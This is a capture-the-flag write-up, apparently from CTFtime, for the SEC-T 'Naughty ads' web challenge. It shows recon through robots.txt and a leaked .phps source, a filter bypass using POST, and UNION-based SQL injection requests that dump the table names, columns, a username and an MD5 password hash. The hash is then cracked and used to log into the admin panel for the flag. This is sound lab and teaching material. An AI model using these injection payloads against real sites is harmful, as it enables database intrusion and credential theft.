CTFtime.org / SEC-T CTF / Naughty ads / Writeup

# ▼▼▼Naughty ads - Web (200point)(122/500team=24.4%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

GET /robots.txt

↓

```
User-agent: *
Disallow: /admin
Disallow: /*.phps
```

GET /index.phps

↓

```

<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>

Home
</CENTER>
</BODY>
</HTML>

<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>

<map name="planetmap">
<area shape="rect" coords="287,93,523,261" href="?id=<?php echo array_pop($cols); ?>" alt="BDSM hookup">
<area shape="rect" coords="542,93,774,261" href="?id=<?php echo array_pop($cols); ?>" alt="Fat fetish">

<area shape="rect" coords="34,282,269,449" href="?id=<?php echo array_pop($cols); ?>" alt="Dirty mistress">
<area shape="rect" coords="292,282,521,449" href="?id=<?php echo array_pop($cols); ?>" alt="Femdom one night stand">
<area shape="rect" coords="545,282,777,449" href="?id=<?php echo array_pop($cols); ?>" alt="Waterboarding extasy">

<area shape="rect" coords="33,468,266,595" href="?id=<?php echo array_pop($cols); ?>" alt="Kinky nightmare">
<area shape="rect" coords="277,456,534,598" href="?id=<?php echo array_pop($cols); ?>" alt="Food fetish">
<area shape="rect" coords="547,466,780,599" href="?id=<?php echo array_pop($cols); ?>" alt="Whip experience">

<area shape="rect" coords="595,23,619,57" href="/admin" alt="Admin">
</map>
</CENTER>
</BODY>
</HTML>
```

↓

＄REQUEST['id']　⇒ filter　and ＄GET['id'] ⇒**SQL injection**

↓

**POST method** To bypass filter.

↓

**POST** /index.php?id='UNION+select+group_concat(**table_name**)+from+information_schema.tables--+

↓

```
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_LOKS,INNODB_TRX,INNODB_SYS_DATAFILES,INNODB_FT_CONFIG,INNODB_SYS_VIRTUAL,INNODB_CMP,INNODB_FT_BEING_DELETED,INNODB_CMP_RESET,INNODB_CMP_PER_INDEX,INNODB_CMPMEM_RESET,INNODB_FT_DELETED,INNODB_BUFFER_PAGE_LRU,INNODB_LOCK_WAITS,INNODB_TEMP_TABLE_INFO,INNODB_SYS_INDEXES,INNODB_SYS_TABLES,INNODB_SYS_FIELDS,INNODB_CMP_PER_INDEX_RESET,INNODB_BUFFER_PAGE,INNODB_FT_DEFAULT_STOPWORD,INNODB_FT_INDEX_TABLE,INNODB_FT_INDEX_CACHE,INNODB_SYS_TABLESPACES,INNODB_METRICS,INNODB_SYS_FOREIGN_COLS,INNODB_CMPMEM,INNODB_BUFFER_POOL_STATS,INNODB_SYS_COLUMNS,INNODB_SYS_FOREIGN,INNODB_SYS_TABLESTATS,ads,login
```

POST /index.php?id='UNION+select+group_concat(**column_name**)+from+information_schema.columns+where+table_name='**login**'--+

↓

```
id,name,password
```

POST /index.php?id='UNION+select+group_concat(**name**)from+**login**--+

↓

```
webmasterofdoom3755
```

POST /index.php?id='UNION+select+group_concat(**password**)from+**login**--+

↓

```
5ebe2294ecd0e0f08eab7690d2a6ee69
```

↓google search

MD5(**secret**)

GET /admin/

↓

Input Basic Authentication 「webmasterofdoom3755:secret」

↓

Input his phone number is "**555-31338**"

↓

**SECT{~tr4nsv3stiT3s_w3lc0me_t00~}**

Naughty ads

Comments

Sign in with